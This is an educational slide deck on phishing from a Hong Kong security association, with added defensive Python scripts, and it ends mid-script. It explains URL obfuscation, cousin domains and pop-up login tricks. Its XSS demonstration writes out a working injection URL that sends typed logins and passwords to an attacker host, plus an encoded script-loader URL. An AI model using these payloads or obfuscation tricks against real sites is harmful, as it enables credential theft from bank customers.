Supported by Computer Studies Division, City University of Hong Kong
Presented by

           Mr. Alan Lam
          Mr. Bernard Kan
          Mr. S.C. Leung

2   (PHISHING )
Disclaimer
    • This material is NOT intended to be adopted in the course of
      attacking any computing system, nor does it encourage such
      act.
    • PISA takes no liability to any act of the user or damage
      caused in making use of this report.
    • The points made here are deliberately kept concise for the
      purpose of presentation. If you require technical details
      please refer to other technical references.




Copyright
    • The copyright of this material belongs to the Professional
      Information Security Association (PISA).
    • A third party could use this material for non-commercial
      purpose, given that no change in the meaning or
      interpretation of the content was made and reference is
      made to PISA. All rights are reserved by PISA.




Agenda
    1. Overview of Phishing
      1.1 What is Phishing?
      1.2 Examples of Phishing: email, web site
      1.3 Current Profile of Phishing Attack

    2. Attack Strategies & Technologies and Defenses
      2.1 Cousin URL Attack
      2.2 URL Obfuscation Attack
      2.3 Face Lift Attack
      2.4 Cross-site Scripting Attack
      2.5 Visual Spoofing Attacks
      2.6 Other Attacks

    3. Defense Strategies Against Phishing Attack
      3.1 Policy and User Education
      3.2 Prevention
      3.3 Detection
      3.4 Incident Response and Collaboration
      3.5 Long Term Dev’t in technology infrastructure and legislation
1.1 What is Phishing?
    Phishing attacks use 'spoofed' e-mails and
    fraudulent websites designed to fool recipients
    into divulging personal financial data such as
    credit card numbers, account usernames and
    passwords, social security numbers, etc.

    Quoted from
    http://www.antiphishing.org



Origin of Term

    • Phreaking + Fishing = Phishing
         • Phreaking: exploiting vulnerability of phone system to make calls
           without paying in the 70’s
         • Fishing : Use of bait to get target on hook






Why has Phishing become a threat to us?
    •   Online transactions, such as e-banking, are becoming more and more popular
         – Verisign July 2004 report: eCommerce yearly increase of 13.2%

    •   In order to make their online transaction service easy to use and please their
        customers, some service providers sacrifice good security features, such as user
        certificates.

    •   Fancy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web
        vulnerabilities which most service providers and browser vendors have not caught
        up with. These web features are supported by most email/newsreaders, search
        engines, chat rooms, or ICQ.

    •   Spamming technology and facilities are becoming mature. Legislation in this area
        cannot catch up.

    •   The Internet being a virtual world, it lacks a physical identity for users to validate.
        Trust building is an intrinsic problem.

    •   The current Internet infrastructure is insecure by default.

    •   It is much cheaper and safer for attackers to carry out fraud on the Internet.

    •   All the above points encourage attackers to seek financial profit through Phishing attacks.
How does Phishing work?
    • Social engineering used in the crafted spam email and fake
      web site
       – Use spoofed identity (of trusted organization) to gain trust
       – Use the wording and tone that the trusted organization usually uses
       – Emphasize an urgency to “update” or “validate” data to rectify a
         problem
       – Threaten to terminate the account or process the mistaken transaction
       – Inform the user of a free coupon or lottery win because of a product
         promotion

    • Luring the victim to a bogus website (the net in fishing)
       – Convincing URL
       – Disguised web interface
           • Make the bogus web site look like the original web site.
           • Detail level down to fonts, company logo, or even the browser UI
       – When users log in to the bogus website, username and password are
         captured.

Workflow of Phishing Attack
     1.   Preparation
          a.   Research and Development
               •   Identify the target organization
               •   Identify the vulnerability of the target organization’s web page
               •   Identify the vulnerability of email reader and web browser that can
                   facilitate the attack
          b.   Prepare scam email and Capture website according to the above
               collected information
          c.   Gather or purchase email addresses
          d.   Ride on SMTP Open Relay or purchase similar services

     2.   Attacking
          a.   Send out scam mail (the bait) via open relay server / services
          b.   Post the scam mail to newsgroups, chat rooms, ICQ messages or
               banner advertising
          c.   Submit the bogus website to search engines
          d.   Wait for victim at the Capture Website (the trapping net)

     3.   Harvesting
          a.   Capture data collected at Capture Website
          b.   Use or Sell the data or captured hosts…

Phishing Categories
     Attackers’ Objectives
        – Fraud in money transfer
        – Fraud in personal information theft
        – Installing Key Logger and Trojan for
          other purposes such as proxy for other
          attacks

     Loss and Damage
        – Financial
        – Leakage of sensitive information
        – Control of computer fallen to attacker
        – Damage to branding and corporate
          image
        – Damage to consumer confidence in
          online transaction and eventually impact
          development of e-Commerce

     Image Source: www.jcsbank.com/phishing.html
Demonstration 1
      Examples of Phishing
      PayPal
      Ebay
      Hang Seng Bank
      HSBC
      Citibank
      US Bank
      SunTrust Bank
      Citizens Bank
1.3 Current Profile of Phishing Attack
     References

     • Verisign Internet Intelligence Briefing (2004-07)
        – http://www.verisign.com/stellent/groups/public/documents/white_paper/00
          6583.pdf


     • Anti-Phishing Working Group (APWG) Trend Report (2004-06)
        – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf

     • Gartner Report (2004-06)
        – Internet Banking Fraud had brought about loss of US$2.4B
        – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004
          /06/21.html#a692


     • Hong Kong Police Statistics (2004-07)
Anti-Phishing Working Group Trend Report (2004-06)

     Monthly unique phishing attacks (count of unique attacks per month):

         Month      Unique attacks
         Jan-04        176
         Feb-04        282
         Mar-04        402
         Apr-04       1125
         May-04       1197
         Jun-04       1422

Phishing Attack Target (APWG 2004-06)

     1.   Citibank
     2.   eBay
     3.   US Bank
     4.   Pay Pal
     …
     12.  VISA
     …
     17.  HSBC

Phishing Web site location
          Verisign (2004-07)                 APWG (2004-06)
          Country          Percentage        Country          Percentage
          USA                  63            USA                  27
          South Korea          10            South Korea          20
          Mainland China        5            Mainland China       16
          Brazil                2            Taiwan                7
          Poland                2            Holland               3


     • Phishermen usually choose a location (APWG 2004-06)
        – where there is a language or time zone difference from the brand owner,
          to create a barrier to closing down the bogus web site
        – on compromised machines (25% by analysis)

Phishing Sender Source
     • Verisign (2004-07)       • APWG (2004-06)

     [Pie charts not reproduced. Categories: Spoofed Address, Cousin Address,
      Web Email Address. Spoofed addresses dominate: 93% (Verisign) and 92% (APWG);
      the two remaining slices are 5% and 2% (Verisign) and 7% and 1% (APWG).]

Phishing impact can be great
     • Impact to USA (Gartner Report 2004-06)
       –   57 million US consumers attacked
       –   3-5% recipients became victims
       –   About 1.98 million reported their account intruded
       –   Loss involved was US$2.4 billion (average loss per victim
           US$1,200)




Phishing and Bogus Website in Hong Kong

     [Bar chart not reproduced: “Phishing and Bogus Website Report”, reported cases
      per month for two series (Phishing Report, Bogus Website), covering mid-2003 to
      mid-2004; the highest monthly value shown is 45 reported cases.
      Source: Hong Kong Police Force]

2. Attack Strategies and Technologies
     • Before 2003, Social Engineering was the major attack
        – Email with impersonated name and logo, together with
          disguised tone of messages
        – Two technical tricks were also used
           • Cousin URL carry similar
           • Bogus URL using old techniques
     • Since 2003, technologies emerged to trick the
       browser, or even mimic the SSL web page style
           •   Face Lift
           •   Bogus URL using new techniques
           •   Cross-site Scripting
           •   Visual Spoofing
           •   Other attacks

2.1 Cousin URL
     Hong Kong Banking Bogus Websites (Source: Hong Kong Police Force)
        2003 (Jan-Dec): 8 cases
        2004 (Jan-Jul): 18 cases

     Some Cousin URLs as example (bogus cousin URLs are listed under the real domain)
        •   www.hkbea.com (real)
                •   www.eastasiacredit.com
                •   www.onlinebea.com
        •   www.hsbc.com (real)
                •   www.hkhsbc.com
        •   hk.dbs.com (real)
                •   www.dbshk.net
        •   www.standardchartered.com (real)
                •   www.scbltd.com
        •   www.dahsing.com (real)
                •   www.dasxin.com
                •   www.dlfh.com
        •   www.iba.com.hk (real)
                •   www.ibabankhk.com
                •   www.hkiba.com
        •   More…

Cousin URL:
     https://visa-secure.com/personal/secure_with_visa/




2.2 URL Obfuscation Attack
     • Normal representation of URL
        – Domain: http://www.pisa.org.hk

     • Dotted representation of IP address URL
        – Decimal: http://202.81.255.242
        – Hexadecimal: http://0xca.0x51.0xff.0xf2
        – Octal: http://0312.0121.0377.0362

     • Dot-less representation of IP address URL
        – Decimal: http://3639552355 http://7689338866 …
        – Hexadecimal: http://0xCA51FFF2
        – Reference:
           A dot-less Decimal IP calculator can be found at
           http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi


2.2 URL Obfuscation Attack
     • Valid use of “@”
        – RFC 1738 (URL) and RFC 2396 (URI Generic Syntax) allow the following
          Uniform Resource Locator (URL) syntax:
           <user>:<password>@<host>:<port>/<url-path>
        – Application: use the URL to carry username and password, e.g.
             • ftp://user1:pass@myftp.com:1021/public/file1.gzip


     • Malicious use of “@” to hide the bogus host
        –   http://www.microsoft.com@www.pisa.org.hk
        –   http://www.microsoft.com@202.81.255.242 (IP address)
        –   http://www.microsoft.com@3394371570 (decimal representation)
        –   http://www.microsoft.com11111111111111111111111111111111111111111111111111111111111@3394371570
            (the long padding pushes the real host out of view in the address bar)

     • The browser’s Address bar and Status bar CAN DISPLAY the
       actual content but a normal user may not notice


2.2 URL Obfuscation Attack
     • Escaped Encoding (or % encoding)
        – RFC 1738 (URL) and RFC 2396 (URI Generic Syntax) allow URL characters to be
          encoded as their ASCII code in hexadecimal representation
        – ”%##” (## : 00 – FF)
            • %20 = [space], %2E = “.”, %7E = “~”
            • %31 = “1”, %32 = “2”
            • %41 = “A”, %61 = “a”
        – Where will this URL bring you to?
            • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D
              = http://www.microsoft.com@yahoo.com (i.e. to yahoo.com)


     • The browser’s Address bar and Status bar CAN DISPLAY the actual
       content but a normal user may not notice

     • Reference of % Encoding and online encode/decoder
       http://www.blooberry.com/indexdot/html/topics/urlencoding.htm

2.2 URL Obfuscation Attack
     • Other derived formats of URI
        – Unicode encoded URL
            • Unicode was designed to allow multiple language implementations of
              the ASCII character set
            • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;&#46;&#111;&#114;&#103;&#46;&#104;&#107;
              (= http://www.pisa.org.hk)
        – Mixed Unicode and ASCII
            • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%67%2E%68%6B
              (= http://www.pisa.org.hk)


     • References
       Unicode Encoding:
       http://www.unicode.org/

       Free Online UTF Decoder (choose “Freeform numeric”):
       http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder

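The encodings listed under 2.2 can be peeled back mechanically before a link is trusted. The following Python script is an added example, not code from the PISA slides: it decodes HTML numeric entities and %-escapes, separates the decoy text before “@” from the host the browser actually connects to, and normalises dotted and dot-less decimal/hex/octal IP forms. The sample links are the ones shown on these slides plus one constructed variant (the 0xCA51FFF2:8080 one); the function names are this example's own.

```python
"""URL de-obfuscation helper for inspecting suspicious links (added example)."""
import html
import ipaddress
import re
from urllib.parse import unquote

# C0 controls and DEL: %00 / %01 inside a link are a red flag on their own
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
ABSOLUTE_URL = re.compile(r"^([a-z][a-z0-9+.-]*)://([^/?#]*)(.*)$", re.I)


def decode_layers(url, max_rounds=5):
    """Undo HTML entities (&#119;) and %XX escapes until nothing changes.

    Returns (decoded_url, rounds_needed); rounds_needed > 0 means the link
    was encoded at least once, which a legitimate bank link rarely is.
    """
    cur = url
    rounds = 0
    for _ in range(max_rounds):
        nxt = unquote(html.unescape(cur))
        if nxt == cur:
            break
        cur = nxt
        rounds += 1
    return cur, rounds


def _octet(part):
    """Parse one dotted component written in decimal, hex (0x..) or octal (0..)."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def normalize_host(host):
    """Return (canonical_host, is_numeric).

    Dotted decimal/hex/octal and dot-less decimal/hex forms all become the
    usual dotted-decimal IPv4 string. A dot-less value above 2**32 is reduced
    modulo 2**32, which is how 7689338866 on the slide lands on 202.81.255.242.
    """
    parts = host.split(".")
    try:
        if len(parts) == 4:
            octets = [_octet(p) for p in parts]
            if all(0 <= o <= 255 for o in octets):
                return ".".join(str(o) for o in octets), True
        elif len(parts) == 1 and parts[0]:
            p = parts[0].lower()
            value = int(p[2:], 16) if p.startswith("0x") else int(p, 10)
            return str(ipaddress.IPv4Address(value % (1 << 32))), True
    except ValueError:
        pass  # an ordinary host name, not a numeric form
    return host.lower(), False


def analyze(url):
    """Describe where a link really leads and which tricks it uses."""
    decoded, rounds = decode_layers(url)
    m = ABSOLUTE_URL.match(decoded)
    if not m:
        return {"error": "not an absolute URL", "decoded": decoded}
    scheme, authority, path = m.groups()
    # RFC 2396: everything before the LAST '@' is userinfo; the host follows it
    userinfo, _, hostport = authority.rpartition("@")
    host, _, port = hostport.partition(":")
    real_host, numeric = normalize_host(host)
    flags = []
    if rounds:
        flags.append("encoded")
    if userinfo:
        flags.append("userinfo-decoy")
    if numeric:
        flags.append("numeric-host")
    if CONTROL_CHARS.search(decoded):
        flags.append("control-chars")
    return {
        "scheme": scheme.lower(),
        "decoy": userinfo,
        "real_host": real_host,
        "port": int(port) if port.isdigit() else None,
        "path": path or "/",
        "flags": flags,
    }


if __name__ == "__main__":
    # Links taken from the slides; the last one is a constructed variant
    samples = [
        "http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D",
        "http://0312.0121.0377.0362",
        "http://7689338866",
        "http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%67%2E%68%6B",
        "http://www.yahoo.com%01%00@www.pisa.org.hk",
        "http://0xCA51FFF2:8080/login",
    ]
    for s in samples:
        r = analyze(s)
        print(f"{s[:48]:<48} -> {r['real_host']} {r['flags']}")
```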
2.2 URL Obfuscation Attack

     • IE or other browser vulnerabilities in displaying the
       proper URL in the
       – Status Bar
       – Address Bar




URL Obfuscation Attack (Status Bar)
     • Inline Javascript
         – <A Href= … onMouseOver=..>
     •   <Form>
     •   <Table>
     •   <Table Border>
     •   <Image Map>




URL Obfuscation Attack (Address Bar) (IE vulnerability in displaying URL)
       • IE 5.x to 6.0 has a vulnerability in handling URLs. When
         the URL contains special characters, the character string
         after the special character cannot be displayed.
         (Microsoft Knowledge Base article 834489)

       • For example, use escaped encoded characters %00 (null
         character) and %01
          – http://www.yahoo.com%01%00@www.pisa.org.hk
          – http://www.yahoo.com%01%00@202.81.255.242
          – http://www.yahoo.com%01%00@3394371570

       • IE will bring the user to “www.pisa.org.hk”, whereas the
         Address bar and Status bar cannot display the true visited
         URL!
IE vulnerability in displaying URL
     • MS04-004 (2004-02) released
       a patch to remove support in
       HTTP for the URI format
       <user>:<password>@<host>:<port>/<url-path>

       http://www.microsoft.com/technet/security/Bulletin/MS04-004.asp


     • However, after applying the
       patch, Address bar and Status
       bar still do NOT display the
       correct URL.

Known attack using the MS04-004 vulnerability

     • Exploit-URLSpoof Trojan

     • McAfee alert
       http://vil.nai.com/vil/content/v_100927.htm




IE vulnerability in handling URL
     • Works with a DNS server which accepts dummy subdomains,
       e.g. http-equiv.dyndns.org

     • http://www.microsoft.com.technet.security.bulletin.MS04-029.mspx.12345.1234512345123456789012345671234567890123456789.box&&cm=&ce=3&hl=malware.http-equiv.dyndns.org/~http-equiv/mwaresoft.html

     Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html

     • Reference URL: http://www.malware.com/malwaresoft.html



2.2 URL Obfuscation Attack
     • Shortened URL
       – http://www.rapp.org/url/
          • PISA http://www.rapp.org/url/?IUVST6C8
          • Workshop: Phishing Exposed
            http://www.rapp.org/url/?KRRQ7YYH


       – http://csua.org/u/
          • PISA http://csua.org/u/9fy
          • Workshop: Phishing Exposed http://csua.org/u/9iu




Demonstration 2
        URL Obfuscation Attacks




2.3 Face Lift
     • Use URL Redirect or similar technology
     • Take advantage of the real web site’s face to
       confuse the identity of the Bogus Login Page

       <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">

       [Screenshot: Online Banking Main Page (real) in the background, with an
        Online Login pop-up (bogus) in front showing Username: myuserid,
        Password: *******]



Case Study ANZ bank phishing

     Email content (excerpt), link written in “%##” hexadecimal format:

     http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32%30%2E%32%30%30:%32%37%38%34/%69%6E%65%74%62%61%6E%6B/%69%6E%64%65%78%2E%68%74%6D

     Bogus URL – old technique; the same link decoded:

     http://anz.com.au2inetbank222@61.10.120.200:2784/inetbank/index.htm

Content of BOGUS web page
         “http://61.10.120.200:2784/inetbank/index.htm”

          :
          <script LANGUAGE="JavaScript">
          :
          SafeAddOnload(PUWStart);

          // 1. PopUp page – Login
          gPopupWindow = new PopupWindow("login.htm", 350, 150);
          gPopupWindow.toolbar = false;
          gPopupWindow.statusbar = true;
          gPopupWindow.resizable = true;
          gPopupWindow.ontop = true;
          </script>
          </head>

          <body bgcolor="#FFFFFF" text="#000000">
          <!-- 2. Background – Redirect -->
          <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
Online Banking Login (Bogus)
 1    PopUp page – Login      [screenshot: bogus login pop-up, No SSL]
 2    Background – Redirect
     <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
Case Study ANZ bank phishing – Face Lift

     [Screenshot: the real ANZ page (2) shown in the background, the bogus login
      pop-up (1) in front with the fields userid / ********]




Case Study ANZ bank phishing – Track Hiding

     [Screenshot: after entering the PIN, the SSL padlock is shown ??!! The
      background page has meanwhile been redirected to the real site.]
Online Banking Login (real)

     [Screenshot: the real login page showing the real digital cert of the
      web site; the real login has the SSL padlock]




Defense vs. Cousin URL (Prevention)
     • Use a consistent and persistent web interface
     • Communicate a single simple domain name
       XYZBank owns these domains and has web servers for each

               xyzbank.com
               xyzcorp.com
               xyzgroup.com

           They use these domains for Online banking
               online-xyzbank.com
               secure-xyzbank.com

           They use these domains for HK and Australia Online banking
               online-xyzbank.com.hk
               secure-xyzbank.com.au


Defense vs. Cousin URL (Prevention)
     • Is this better?

       XYZBank owns these domains

              xyzbank.com (only active domain)
              xyzcorp.com (forwards to xyzbank.com)
              xyzgroup.com (forwards to xyzbank.com)

          They use these subdomains for Online banking
              online.xyzbank.com (personal banking)
              secure.xyzbank.com (corporate banking)

          They use these URL paths for HK and Australia Online banking
              online.xyzbank.com/hk/
              secure.xyzbank.com/au/




Defense vs. Cousin URL (Detection)

     •   Brand Management
     •   Domain Monitoring
     •   Web Crawling
     •   Intelligence Report from
         Spam Filtering services

     (All of the above can be outsourced)




Detection (Server side)
     • Detect mirroring by a copycat web site
       – Monitor large-volume traffic, especially from a
         single subnet
       – Place honeypot links (invisible links with no
         legitimate use) and check the “access log” for
         accesses to them

     • Detect referral sites
       – At your web server, monitor the referrer
         information in the “access log”; it may give you
         information on the referral site, search engine or
         attacker behind a Face Lift / Framing / etc. attack

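Both server-side checks above can be automated over the web server's access log. The following Python script is an added example, not part of the PISA material: it parses Apache combined-format lines, flags hits on a honeypot path, counts requests per /24 to surface mirroring, and lists referrers whose host is outside the bank's own domains. The domain names, honeypot path, threshold and log lines are constructed for this example.

```python
"""Server-side phishing detection over an access log (added example)."""
import ipaddress
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache "combined" log format
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Hypothetical values for the example: the bank's own hosts, the invisible
# honeypot link a browser never follows but a site copier does, and how many
# requests from one /24 within the log window count as mirroring.
OWN_HOSTS = {"www.xyzbank.com", "online.xyzbank.com", "secure.xyzbank.com"}
HONEYPOT_PATHS = {"/img/spacer-1x1.gif.html"}
MIRROR_THRESHOLD = 50


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def subnet24(ip):
    """Collapse an IPv4 address to its /24 (unparseable input is returned as-is)."""
    try:
        return str(ipaddress.ip_network(f"{ip}/24", strict=False))
    except ValueError:
        return ip


def analyze_log(lines):
    """Run the three detections and return their findings."""
    honeypot_hits = []
    foreign_referers = Counter()
    per_subnet = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_subnet[subnet24(rec["ip"])] += 1
        if rec["path"] in HONEYPOT_PATHS:
            honeypot_hits.append(rec["ip"])
        ref = rec["referer"]
        if ref and ref != "-":
            # Referrer host outside our own domains: a face-lift/framing page,
            # a search engine, or the landing page of a scam mail
            rhost = (urlsplit(ref).hostname or "").lower()
            if rhost not in OWN_HOSTS:
                foreign_referers[rhost] += 1
    mirroring = sorted(s for s, n in per_subnet.items() if n >= MIRROR_THRESHOLD)
    return {
        "honeypot_hits": honeypot_hits,
        "foreign_referers": dict(foreign_referers),
        "mirroring_subnets": mirroring,
    }


def make_sample_log():
    """Constructed sample: a site copier on 10.20.30.0/24 fetches 60 pages and
    trips the honeypot link; one visitor arrives from a bogus login page, one
    from a search engine and one from the bank's own subdomain."""
    lines = []
    for i in range(60):
        lines.append(
            f'10.20.30.{i % 20 + 1} - - [21/Jul/2004:10:{i:02d}:00 +0800] '
            f'"GET /page{i}.html HTTP/1.1" 200 1024 "-" "Wget/1.9"'
        )
    lines += [
        '10.20.30.7 - - [21/Jul/2004:11:00:00 +0800] '
        '"GET /img/spacer-1x1.gif.html HTTP/1.1" 200 43 "-" "Wget/1.9"',
        '192.0.2.10 - - [21/Jul/2004:11:05:00 +0800] "GET /ebanking/login HTTP/1.1" '
        '200 5120 "http://bogus-login.example/inetbank/index.htm" "Mozilla/4.0"',
        '192.0.2.11 - - [21/Jul/2004:11:06:00 +0800] "GET / HTTP/1.1" '
        '200 2048 "http://online.xyzbank.com/hk/" "Mozilla/4.0"',
        '198.51.100.5 - - [21/Jul/2004:11:07:00 +0800] "GET / HTTP/1.1" '
        '200 2048 "http://www.google.com/search?q=xyzbank" "Mozilla/4.0"',
    ]
    return lines


if __name__ == "__main__":
    for key, value in analyze_log(make_sample_log()).items():
        print(f"{key}: {value}")
```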
Server and Site Design
     Reference

     • PISA’s HK e-Commerce Security Survey 2003
       – Non-intrusive and Anonymous study on 25 local on-line
         transaction sites
          • Application design
          • SSL and Encrypted Communication Digital Certificate
            Implementation
          • Password Management
          • Operation Control
       – URL
          • http://www.pisa.org.hk/projects/websec2003/websec2003.htm




Detection (Client side)
     • Browser
       – check digital certificate;
         and turn on alert when
         browser enters or
         leaves SSL mode




Detection (Client side)
     • SpoofStick (browser plug-in)

     • eBay Toolbar (browser plug-in)
       – Incorporated “Web CallerID” technology (acquired from WholeSecurity)
         to detect suspicious activity in web pages. Web CallerID acts like a
         heuristic filter for phishers, detecting previously undiscovered spam
           • http://www.eweek.com/article2/0,1759,1636422,00.asp


Detection (Client)
     • Some Antivirus programs detect malicious
       popup javascript in web page




Detection (Client)
     • http://%32%31%31%2E%39%37%2E%32%34%38%2E%36%30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68%74%6D
       ( http://211.97.248.60:87/cit/confirm.htm)




2.4 Cross-Site Scripting
     • A cross-site scripting vulnerability allows the
       introduction of malicious content (scripts) on a
       web site, that is then served to users (clients)
       – Malicious scripts get executed on clients that trust
         the web site
       – Problem with potentially all client-side scripting
         languages
     • Use “XSS” to refer to these vulnerabilities, to
       avoid confusion with “CSS” (cascading style
       sheets)

XSS Concept
     • Any way to fool a legitimate web site to send
       malicious code to a user’s browser
     • Almost always involves user content (third
       party)
       – Error messages
       – User comments
       – Links
     • References
       – http://www.cert.org/archive/pdf/cross_site_scripting.pdf
       – http://www.spidynamics.com/support/whitepapers/SPIcross-sitescripting.pdf
Why the Name
     • You think that you interact with site Z
     • Site Z has been poisoned by the attacker
     • The “poison” (e.g. JavaScript) is sent to you,
       along with legitimate content, and executes. It
       can exploit browser vulnerabilities, or contact
       site M and steal your cookies, usernames and
       passwords...

     [Diagram: the user surfs to Z; Z returns legitimate content plus the poison;
      the hostile code executes in the browser and talks to M]

XSS Risks
     •   Theft of account credentials and services
     •   User tracking (stalking) and statistics
     •   Misinformation from a trusted site
     •   Denial of service
     •   Exploitation of web browser
         – Create phony user interface
         – Exploit a bug in the browser
         – Exploit a bug in a browser extension such as Flash
           or Java
     • Etc.
XSS Risks - Stolen Account Credentials
     • With XSS, it may be possible for your
       credentials to be stolen and used by an attacker
     • Sites requiring authentication need a
       technological solution to avoid
       continuously asking users for passwords
       – Credentials have the form of a SessionID or nonce
          • URL encoding (GET method)
             – http://www.site.com?ID=34539027644
          • Cookies are commonly used to store credentials
             – These are usually accessible to client-side scripts




Cookie Mechanism and Vulnerabilities
     • Used to store state on the client browser
     • Access Control
       – Includes specification of which servers can access
         the cookie (a basic access control)
          • Including a path on the server
       – So cookie can be used to store secrets (sessionIDs
         or nonces)




XSS - Point
     • XSS vulnerabilities fool the access control
       mechanism for cookies
     • The request for the cookie (by scripts) comes
       from the poisoned server, and so is honored by
       the client browser
       – No vulnerabilities needed in the client browser




XSS Risk - Privacy and Misinformation
     • Scripts can “spy” on what you do
       – Access history of sites visited
       – Track content you post to a web site
     • Scripts can misinform
       – Modify the web page you are viewing
       – Modify content that you post
     • Privacy ("I have nothing to hide")
       – Knowledge about you can be valuable and be used
         against you
          • Divorces, religion, hobbies, opinions, etc.

Example: Google's XSS Vulnerability
     • Made public on 20 October 2004
     • Script could be injected through the cof parameter of Google's
       custom search page, turning Google into a loader for
       attacker-supplied script:
       – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
       – The hex-encoded value after L: (the custom logo URL) decodes to
         javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test2.js'
         i.e. a script element pointing at an external file, executed in
         Google's origin




XSS Risk - Denial of Service
     • Nasty JavaScripts can make your web site
       inaccessible
       – Make browsers crash or become inoperable
       – Redirect browsers to other web sites




XSS Risk - Silent Install
     • Exploitation of browser vulnerabilities
       – JavaScript, ActiveX, etc. give injected content a path to
         browser vulnerabilities
          • The exploit runs locally on your machine
          • Example: user security confirmation bypass vulnerability in
            Microsoft Internet Explorer 6.0 SP2:
             – http://securityfocus.com/bid/11200/
             – Allows malicious users to trivially bypass the requirement for
               user confirmation to load JavaScript or ActiveX
       – Result: installation of malicious code without the user noticing



XSS Risk - Phishing
     • User interface modifications
       – Present fake authentication dialogs, capture the information,
         then perhaps redirect the user to the real web site
       – Replace the location toolbar to make the user think they are
         visiting a certain web site
     • Phishing scenario
          • Victim logs into a web site
          • Attacker has spread "mines" (links carrying the XSS payload)
            using an XSS vulnerability in that site
          • Victim stumbles upon an XSS mine
          • Victim gets a message saying that their session has
            expired, and they need to authenticate again
          • Victim's username and password are sent to the attacker

Demonstration 3 - www.pisabank.com
     (Walkthrough of the screenshots shown in the demonstration.)

     1. After a successful user login, the bank site behaves normally.
     2. However, if the login fails, the login page reports the error
        by echoing the err parameter of the URL back into the page.
     3. Try putting scripts in the URL: the injected script is
        reflected into the page unfiltered, which reveals the
        vulnerability.
     4. The goal is to inject code that closes the bank's own login
        form and opens a new one whose onsubmit handler sends the
        typed login name and password to the attacker's server.
     5. We create the following URL:
        http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value;%22%3E
     6. Put the URL in scam mails.
     7. When the hyperlink is clicked, the genuine login page loads
        from www.pisabank.com with the attacker's form in it.
     8. After the user logs in, nothing special is visible to the user.
     9. However, in www.hacker.com's web server log, the login name
        and password are recorded (the 404 is irrelevant; the request
        line is what the attacker wanted):
        192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 719

XSS - Prevention
     • For users:
       – Disable scripting in the browser (some personal
         firewalls can selectively block or allow scripts from
         particular web sites)
       – Do not trust links in e-mails; type the URL directly into
         the browser
       – Always log out before browsing elsewhere, so that a stolen
         session cookie is no longer valid
       – Keep up with web browser patches and versions




XSS - Prevention
     • For administrators/developers:
       – User input should be parsed and filtered properly,
         especially the characters < > " ' % ; ) ( & + -
       – Some decent guidelines for input filtering can be
         found in the OWASP guide "OWASP Guide to Building
         Secure Web Applications and Web Services"
          • http://www.owasp.org/documentation/guide.html
       – Output that echoes input parameters should have special
         characters encoded as HTML entities (e.g. &lt; for <),
         with the response character set declared explicitly
         (e.g. ISO-8859-1), as CERT advises
          • http://www.cert.org/advisories/CA-2000-02.html

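The reflection that Demonstration 3 exploits (the err parameter echoed into the login page) next to the output-encoding fix recommended above, as an added example that is not code from the PISA demo site or from the original deck. The URL is the one from the demonstration; the login page template, the helper names and the hand-rolled query parser are assumptions made for this illustration.

```python
import html
from urllib.parse import urlsplit, unquote

# The demonstration URL from the slides: the injected form posts to login1.asp and its
# onsubmit handler leaks login:password to www.hacker.com through an Image request.
DEMO_URL = (
    "http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAccess"
    "&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com"
    "&err=%3C/form%3E%3Cform%20action=%22login1.asp%22%20method=%22post%22%20onsubmit="
    "%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20"
    "document.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value;%22%3E"
)

# Assumed page template modelled on what banklogin.jsp must do: echo the err value
# above the login form. The only braces in it are the err placeholder.
PAGE_TEMPLATE = (
    "<html><body>\n"
    '<form action="banklogin.jsp" method="post">\n'
    '<p class="error">{err}</p>\n'
    'Login: <input name="login"><br>\n'
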